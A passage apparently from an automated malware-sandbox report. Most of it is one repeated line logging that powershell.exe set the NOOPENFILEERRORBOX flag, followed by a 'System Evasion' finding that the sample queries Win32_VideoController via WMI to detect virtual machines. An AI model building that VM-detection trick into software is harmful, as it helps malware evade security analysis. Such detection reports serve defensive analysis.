Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
